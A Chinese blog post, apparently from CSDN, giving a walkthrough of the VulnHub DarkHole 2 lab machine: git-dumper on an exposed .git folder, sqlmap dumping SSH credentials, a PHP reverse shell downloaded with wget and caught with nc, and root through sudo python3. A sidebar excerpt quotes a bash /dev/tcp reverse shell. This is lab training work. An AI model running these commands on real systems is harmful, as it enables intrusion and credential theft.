VulnHub—DarkHole_ 2

已于 2024-01-09 16:26:56 修改
阅读量82 收藏
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-06-19 18:56:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131286004
版权

靶机下载地址为:vulnhub-DARKHOLE: 2

靶机IP:192.168.245.140

测试机系统:kali、win10

测试机IP:192.168.245.139

目录

1.信息收集

1.1主机发现

1.2扫描IP端口服务

2.漏洞挖掘

3.权限提升

4.获取root权限

1.信息收集

1.1主机发现

nmap -sn 192.168.245.0/24

  发现靶机IP:192.168.245.140

1.2扫描IP端口服务

Nmap 探测该IP的端口和服务

nmap -A -P 192.168.245.140

2.漏洞挖掘

1.进入网页

访问一下站点,页面存在登陆接口Login。

点击login,跳转至登陆页面

此时查看了下前端的JS文件 并未发现有价值的信息。

再访问之前的那个.git目录

提到.git,我们可以使用git泄露利用工具git-dumper。

git clone https://github.com/arthaud/git-dumper.git	#下载脚本
cd git-dumper
./git_dumper.py http://192.168.245.140/.git 130 	#执行脚本

 执行完成后cd 130/,收集有用的信息

 收集到的信息一:数据库账号密码

cd config
ls
cat config.php

收集到的信息二:commit logs存在,我们可以利用它查找主人曾修改过哪些地方

 

使用工具git

git log	#查看日志

通过log可知主人曾修改过三次,我们都来用git diff试试,看看有没有咱们能用的信息。

git diff [commit]	#git diff用法
git diff a4d900a8d85e8938d3601f3cef113ee293028e10	#这里有有用的信息

这里得到了登录的用户名=lush@admin.com和密码=321,就可以去登录了!

登录进来了,看到这个页面,我们可以使用sqlmap了!

在使用sqlmap前,先把id值改为2,使用Burpsuite抓包,存到文件名为bao的文件中。

现在可以使用sqlmap语句枚举数据库了。

mousepad bao
cat bao
sqlmap -r bao --tables		#枚举数据库及表名

 一路回车就可以看到数据库及表名

有用的就是这个ssh的表,下面我们继续枚举

sqlmap -r bao --columns -D "darkhole_2" -T "ssh"	#枚举ssh库列名

是我们需要的表,现在我们需要dump他的数据!

sqlmap -r bao --dump -D "darkhole_2" -T "ssh" 	#显示表内数据

现在我们得到了ssh的用户名和密码

可以ssh jehad用户了!

ssh jehad@192.168.245.140	#ssh连接jehad用户

成功登录!

3.权限提升

由id命令可知,jehad并不是root用户

所以让我们看看各个目录下,能不能找到什么有用的~

最终在/opt目录下找到了有用的、可以调cmd的php页面~

未发现我们需要的东西,所以使用了命令history看看能从历史操作得到什么发现

在历史命令列表中我们得到了很有意思的东西,所以理出后续提权思路:该web布在9999端口,使用curl命令查看cmd执行回显,使用wget下载php版reverse shell,于攻击机监听,一切准备好后使9999连接攻击机,得到其他人的权限。

成功后,我们会变成losy

我们继续

首先,我们从网上检索php reverse shell,使用链接https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php,下载后存到攻击机桌面并简单命名为1.php,修改反shell的ip和端口为攻击机的,如下:

 然后在文件夹内打开终端,通过python3开启web服务

python3 -m http.server 8000		#端口随意,未被占用即可

使用其他机器,访问一下,看没有问题然后,我们使用jehad用户,进入/opt/web/目录下,将1.php下载下来

cd /opt/web/
wget 192.168.245.139:8090/1.php		#下载文件

 本机开始监听

nc -nvlp 5555		#攻击机监听

 通过curl访问1.php执行脚本,使losy上线

到此,losy已上线 

由于这是一个不完整的shell,很多事情我们不能做,所以我们需要使用语句升级成完整shell

/bin/bash -i

losy仍不是root,所以我们到它的history有什么值得利用的部分

history

我们找到了losy的密码以及提权命令!

接下来我们ssh到losy

4.获取root权限

losy是有sudo权限的

sudo -l 查看命令

 可以看到python3有root权限,我们直接 sudo 可以执行 python3 切换到 root shell

利用:

sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

 最终提权成功,查找信息,获取flag

廾匸0705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 211
DarkHole2
vuluhub-darkhole2 打靶记录
lcc001114的博客
06-14 167
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
VulnhubDARKHOLE: 2渗透测试
Bird&Bird
01-11 3807
目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali:192.168.110.128 靶机:192.168.110.137 2、信息搜集 首先探测靶机IP地址 扫一下端口和服务,可知靶机只开启了2
Vulnhub-DarkHole_2-Writeup
cmdos的专栏
04-07 87
Vulnhub 靶机D 福建红色教育培训 www.qhganxun.cn arkhole2 题解,包含.git源码漏洞、SQL注入漏洞、远程命令执行漏洞、权限提升等内容。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3463
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHubDarkHole_ 1
2301_76786857的博客
07-09 144
靶机IP:192.168.245.143测试机系统:kali、win10测试机IP:192.168.245.139。
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 163
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 974
VulnHub-DarkHole: 2靶机详细渗透过程
2024年网络安全最全VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新2024最新网络安全面试真题解析
2401_84297944的博客
05-11 557
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8305
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
加密与安全_三种方式实现基于国密非对称加密算法的加解密和签名验签
最新发布
小工匠
06-30 1004
无需秘钥,“加密”后的数据不可逆。所以这也不算是“加密”,一般称为哈希(Hash)。任何长度的数据生成的哈希值长度都固定。相同数据每次生成的哈希值相同,不同的数据则不同。数据摘要/哈希,验证数据是否被篡改、或数据丢失,保障数据的完整性、不可篡改性。单向加密保存数据,如密码的保存,密码的存储普遍都是存的哈希值,登录时比较其hash值即可。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 357
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 347
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值